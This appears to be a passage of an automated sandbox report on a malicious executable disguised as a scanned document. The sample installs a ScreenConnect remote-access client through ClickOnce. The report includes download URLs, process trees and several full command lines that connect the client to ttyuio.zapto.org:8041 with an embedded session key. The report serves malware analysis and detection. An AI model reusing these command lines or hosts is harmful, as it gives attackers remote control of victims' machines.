                  Source: dfsvc.exe, 00000001.00000002.2638143104.00000261F9404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsFileManager.exe.configC
                  Source: dfsvc.exe, 00000001.00000002.2619140064.00000261805C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsFileManager.exe.p
                  Source: dfsvc.exe, 00000001.00000002.2638143104.00000261F9404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsFileManager.exeO
                  Source: ScreenConnect.Core.dll0.1.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
                  Source: qmgr.db.5.dr, edb.log.5.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                  Source: edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                  Source: edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                  Source: edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                  Source: edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                  Source: qmgr.db.5.dr, edb.log.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                  Source: edb.log.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                  Source: unknownHTTPS traffic detected: 178.215.236.119:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141Jump to dropped file

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

                  System Summary

                  barindex
                  Source: initial sampleStatic PE information: Filename: Scan_doc_09_16_24_1203.exe
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeCode function: 11_2_05950360 CreateProcessAsUserW,11_2_05950360
                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\user.config
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeCode function: 0_2_005EA4950_2_005EA495
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B8B2B691_2_00007FFD9B8B2B69
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B8C2AE01_2_00007FFD9B8C2AE0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B8AAEF51_2_00007FFD9B8AAEF5
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B8BD2B51_2_00007FFD9B8BD2B5
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B8AA4601_2_00007FFD9B8AA460
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B8C28F81_2_00007FFD9B8C28F8
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B8AF8A11_2_00007FFD9B8AF8A1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B8A12111_2_00007FFD9B8A1211
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B8A61381_2_00007FFD9B8A6138
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B8C30811_2_00007FFD9B8C3081
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9B8770BD12_2_00007FFD9B8770BD
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9B8710CF12_2_00007FFD9B8710CF
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9B8710D712_2_00007FFD9B8710D7
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9BB8583412_2_00007FFD9BB85834
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9BB8562112_2_00007FFD9BB85621
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9BB863C212_2_00007FFD9BB863C2
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9BB862E912_2_00007FFD9BB862E9
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9BB8646812_2_00007FFD9BB86468
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FFD9B8A70BD13_2_00007FFD9B8A70BD
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FFD9B8A10D713_2_00007FFD9B8A10D7
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FFD9B8A10CF13_2_00007FFD9B8A10CF
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FFD9BBBE1EC13_2_00007FFD9BBBE1EC
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FFD9BBB1FB813_2_00007FFD9BBB1FB8
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FFD9BBBEF9C13_2_00007FFD9BBBEF9C
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FFD9BBB5E2113_2_00007FFD9BBB5E21
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FFD9BBB6C6C13_2_00007FFD9BBB6C6C
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 7140 -ip 7140
                  Source: Scan_doc_09_16_24_1203.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: ScreenConnect.ClientService.dll.1.dr, WindowsLocalUserExtensions.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: classification engineClassification label: mal66.evad.winEXE@19/75@2/2
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeCode function: 0_2_005E1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_005E1000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\DeploymentJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeMutant created: NULL
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7140
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\DeploymentJump to behavior
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeCommand line argument: dfshim0_2_005E1000
                  Source: Scan_doc_09_16_24_1203.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Scan_doc_09_16_24_1203.exeReversingLabs: Detection: 15%
                  Source: Scan_doc_09_16_24_1203.exeVirustotal: Detection: 13%
                  Source: unknownProcess created: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe "C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe"
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 7140 -ip 7140
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7140 -s 884
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=e76a7089-9bd3-460c-8e9c-7b01b18dcd91&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=e76a7089-9bd3-460c-8e9c-7b01b18dcd91&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe" "RunRole" "d21d76fd-518c-4e0e-8974-ad827e70c72a" "User"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe" "RunRole" "ebaebc1a-63a2-4828-be16-c29c94055c3f" "System"
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe"Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 7140 -ip 7140Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7140 -s 884Jump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=e76a7089-9bd3-460c-8e9c-7b01b18dcd91&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe" "RunRole" "d21d76fd-518c-4e0e-8974-ad827e70c72a" "User"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe" "RunRole" "ebaebc1a-63a2-4828-be16-c29c94055c3f" "System"
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeSection loaded: cryptbase.dllJump to behavior
